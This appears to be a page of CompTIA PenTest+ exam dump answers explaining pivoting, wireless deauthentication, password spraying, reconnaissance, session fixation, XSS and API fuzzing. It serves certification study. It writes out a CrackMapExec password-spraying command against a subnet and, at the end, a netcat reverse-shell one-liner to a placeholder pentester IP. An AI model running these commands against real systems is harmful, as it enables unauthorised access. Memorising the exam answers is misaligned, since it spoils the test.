PT0-003 Exam Dumps - CompTIA PenTest+ Questions and Answers

Pivoting allows attackers to use a compromised host as a gateway to access internal resources.

Create an SSH tunnel using sshuttle (Option A):

sshuttle creates a transparent VPN-like connection over SSH, allowing the tester to forward traffic securely.

Advantages:

Provides encryption, preventing IDS/IPS detection.

Requires minimal interaction with the compromised host.

Deauthentication is the correct answer because it is classically effective against WPA2 wireless networks, while WPA3 includes protections against unauthenticated deauthentication management-frame abuse when properly implemented with Protected Management Frames. Since AP3 is the only access point using WPA2, it is the only one that clearly remains the specific target for this attack in the scenario. A deauthentication attack forces connected clients off the network, often to capture handshakes or to push users toward reconnect behavior during wireless assessments. Brute force is not exclusive to AP3 in the way this question asks, signal jamming can affect any wireless network regardless of security standard, and evil twin attacks are not limited only to WPA2 networks. Therefore, the attack that applies only to AP3, based on its WPA2 configuration, is deauthentication.

The command crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@ is used to perform password spraying on internal systems. CrackMapExec (CME) is a post-exploitation tool that helps automate the process of assessing large Active Directory networks. It supports multiple protocols, including SMB, and can perform various actions like password spraying, command execution, and more.

CrackMapExec:

CrackMapExec: A versatile tool designed for pentesters to facilitate the assessment of large Active Directory networks. It supports various protocols such as SMB, WinRM, and LDAP.

Purpose: Commonly used for tasks like password spraying, credential validation, and command execution.

Command Breakdown:

crackmapexec smb: Specifies the protocol to use, in this case, SMB (Server Message Block), which is commonly used for file sharing and communication between nodes in a network.

192.168.1.0/24: The target IP range, indicating a subnet scan across all IP addresses in the range.

-u user.txt: Specifies the file containing the list of usernames to be used for the attack.

-p Summer123@: Specifies the password to be used for all usernames in the user.txt file.

Password Spraying:

Definition: A technique where a single password (or a small number of passwords) is tried against a large number of usernames to avoid account lockouts that occur when brute-forcing a single account.

Goal: To find valid username-password combinations without triggering account lockout mechanisms.

Pentest References:

Password Spraying: An effective method for gaining initial access during penetration tests, particularly against organizations that have weak password policies or commonly used passwords.

CrackMapExec: Widely used in penetration testing for its ability to automate and streamline the process of credential validation and exploitation across large networks.

By using the specified command, the tester performs a password spraying attack, attempting to log in with a common password across multiple usernames, identifying potential weak accounts.

======

Option A uses Shodan’s API to gather information about a target without directly touching the target system. This makes it the stealthiest option as there ' s no traffic generated from the tester’s IP to the target.

Options B & D use Nmap which is active scanning, and while -T2 reduces intensity, it still generates packets.

Option C is a custom curl script that also interacts directly with the target and can trigger IDS alerts.

CompTIA PenTest+ Reference:

PT0-003 Objective 2.1 & 2.3: Passive vs Active reconnaissance techniques.

Using OSINT sources like Shodan is a key stealth recon method.

When traditional reconnaissance methods are blocked, scanning code repositories is an effective method to gather information. Here’s why:

Code Repository Scanning:

Leaked Information: Code repositories (e.g., GitHub, GitLab) often contain sensitive information, including API keys, configuration files, and even credentials that developers might inadvertently commit.

Accessible: These repositories can often be accessed publicly, bypassing traditional defenses like WAFs.

Comparison with Other Methods:

HTML Scraping: Limited to the data present on web pages and can still be blocked by WAF.

Directory Enumeration: Likely to be blocked by WAF as well and might not yield significant internal information.

Port Scanning: Also likely to be blocked or trigger alerts on WAF or IDS/IPS systems.

Scanning code repositories allows gathering a wide range of information that can be critical for further penetration testing effort

======

Session fixation occurs when an application accepts a session identifier provided by the client (or set before authentication) and continues to use that same identifier after the user authenticates. In this scenario the server issues the same cookie value both before and after login, indicating the session ID is set pre-authentication and not rotated/renewed on successful authentication — a classic session fixation vulnerability. An attacker could force or coerce a victim to use a known session ID, then log in and hijack the authenticated session.

Why not the others:

A. JWT manipulation: Would involve JSON Web Tokens (signed tokens with predictable structure); the cookie shown has no JWT structure.

B. Cookie poisoning: Usually refers to unauthorized modification of cookie contents to change application behavior — not the primary issue here.

D. Collision attack: Cryptographic collision attacks are not relevant to identical session cookies before/after login.

CompTIA PT0-003 Mapping:

Domain 3.0 Attacks and Exploits — web application session management vulnerabilities (session fixation, improper session handling).

Cross-Site Scripting (XSS) is an attack that involves injecting malicious scripts into web pages viewed by other users. Here’s why option C is correct:

XSS (Cross-Site Scripting): This attack involves injecting JavaScript into a web application, which is then executed by the user’s browser. The scenario describes injecting a JavaScript prompt, which is a typical XSS payload.

SQL Injection: This involves injecting SQL commands to manipulate the database and does not relate to JavaScript injection.

SSRF (Server-Side Request Forgery): This attack tricks the server into making requests to unintended locations, which is not related to client-side JavaScript execution.

Server-Side Template Injection: This involves injecting code into server-side templates, not JavaScript that executes in the user’s browser.

References from Pentest:

Horizontall HTB: Demonstrates identifying and exploiting XSS vulnerabilities in web applications​​.

Luke HTB: Highlights the process of testing for XSS by injecting scripts and observing their execution in the browser​​.

======

The Wayback Machine is an online tool that archives web pages over time, allowing users to see how a website looked at various points in its history. This can be extremely useful for penetration testers looking to explore potential security weaknesses by searching for subdomains that might have existed in the past.

Accessing the Wayback Machine:

Go to the Wayback Machine website: archive.org/web.

Enter the URL of the target website you want to explore.

Navigating Archived Pages:

The Wayback Machine provides a timeline and calendar interface to browse through different snapshots taken over time.

Select a snapshot to view the archived version of the site. Look for links, subdomains, and resources that may no longer be available in the current version of the website.

Identifying Subdomains:

Examine the archived pages for references to subdomains, which might be visible in links, scripts, or embedded content.

Use the information gathered to identify potential entry points or older versions of web applications that might still be exploitable.

Tool Integration:

Tools like Burp Suite or SpiderFoot can integrate with the Wayback Machine to automate the discovery process of archived subdomains and resources.

Real-World Example:

During a penetration test, a tester might find references to oldadmin.targetsite.com in an archived page from several years ago. This subdomain might no longer be listed in DNS but could still be accessible, leading to potential security vulnerabilities.

References from Pentesting Literature:

In various penetration testing guides and HTB write-ups, using the Wayback Machine is a common technique for passive reconnaissance, providing historical context and revealing past configurations that might still be exploitable.

Step-by-Step ExplanationReferences:

HTB Official Writeups

======

This attack attempts to manipulate the API by fuzzing the authorization token (Authorization: Bearer (FUZZ)). This suggests an attempt to bypass authentication or escalate privileges by using an invalid, stolen, or guessed token—a form of API abuse.

Option A (Directory traversal) ❌:

Involves manipulating file paths (e.g., ../../../etc/passwd), but this attack targets API authentication.

Option B (API abuse) ✅:

Correct. Fuzzing the authorization token suggests an attempt to bypass authentication or test for weak API security.

Option C (Server-side request forgery - SSRF) ❌:

SSRF manipulates backend requests to make unauthorized HTTP calls, which is not evident here.

Option D (Privilege escalation) ❌:

While API abuse may lead to privilege escalation, fuzzing the token alone does not directly escalate privileges.

???? Reference: CompTIA PenTest+ PT0-003 Official Guide – API Security Testing & Authentication Bypasses

The tester needs to pivot from the compromised web server while bypassing firewall restrictions that allow:

Inbound traffic only on TCP 443 (HTTPS) and TCP 53 (DNS)

Unrestricted outbound traffic

Reverse shell using TCP 443 (Option D):

This command initiates an outbound connection to the pentester ' s machine on port 443, which is allowed by the firewall.

Example:

/bin/sh -c ' nc < pentester_ip > 443 -e /bin/sh '

The pentester listens on TCP 443 and receives the shell from the target.